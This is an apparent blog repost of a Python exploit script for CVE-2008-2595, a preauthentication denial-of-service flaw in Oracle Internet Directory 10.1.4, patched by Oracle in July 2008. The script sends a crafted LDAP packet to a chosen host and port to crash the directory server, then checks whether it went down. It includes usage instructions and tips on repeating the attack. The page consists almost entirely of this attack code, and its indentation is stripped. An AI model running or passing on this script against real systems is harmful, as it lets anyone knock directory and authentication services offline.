Oracle Internet Directory 10.1.4 preauthentication DoS Exploit

·

#!/usr/bin/python

"""
Oracle Internet Directory 10.1.4 preauthentication Denial Of Service

NOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours. Sometimes you need 2 shoots to crash OID completely. The server "commonly" tolerates one shoot, but even when you only send one packet it will crash.

Tested: Win2000 x86, WinXP x86, Win2003 X86_64

Vulnerability found by Joxean Koret (joxeankoret [ at ] yahoo DOT es)

Fixed: Oracle Critical Patch Update July 2008
CVEID: CVE-2008-2595
"""

import sys
import time
import socket
healthPacket = "0%\\x02\\x01\\x01c \\x04\\x00\\n\\x01\\
x02\\n\\x01\\x00\\x02\\x01\\x00\\x02\\x01\\x00\\x01\\
x01\\x00\\x87\\x0bobjectClass0\\x00"

packet = "\x30\x0e\x02\x01\x01\x60\x09\x30\x01\
x03\x04\x02\x44\x4e\x80\x00"

def checkHealth(hostname, port):
print " --> Wating 5 seconds"
time.sleep(5)

print " --> Connecting to target..."
socket.setdefaulttimeout(5)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((hostname, port))

try:
print " --> Sending 'health' packet ..."
s.sendall(healthPacket)
print " --> Trying to receive something..."
data = s.recv(1024)
except:
err = sys.exc_info()[1]

if int(err[0]) == 104:
print "[+] Exploits works!"
return

if data != "":
print "[!] Server is up and running :("
else:
print "[?] Server doesn't answer nothing. It works?"

def oidDos(hostname, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print "[+] Connecting to ldap://%s:%d..." % (hostname, port)
s.connect((hostname, int(port)))

print "[+] Sending packet..."
s.sendall(packet)
s.close()

print "[+] Checking OID's health..."
checkHealth(hostname, port)
except:
print sys.exc_info()[1]

def usage():
print "Oracle Internet Directory 10.1.4 Remote Preauthentication DOS"
print "Copyright (c) 2007 Joxean Koret"
print
print "Usage:"
print sys.argv[0],"-h -p"
print

def main():
if len(sys.argv) != 3:
usage()
sys.exit(0)

hostname = None
port = None

i = 0
for param in sys.argv:
i += 1

if i == 1:
continue

if param.startswith("-h"):
hostname = param[2:]
elif param.startswith("-p"):
port = int(param[2:])
else:
print "Unknown option '%s'" % param
usage()
sys.exit(1)

if not hostname or not port:
print "Bad command line."
usage()
sys.exit(1)

oidDos(hostname, port)

if __name__ == "__main__":
main()

0 comments:

Related Posts Plugin for WordPress, Blogger...

Contact Form

Name

Email *

Message *

Followers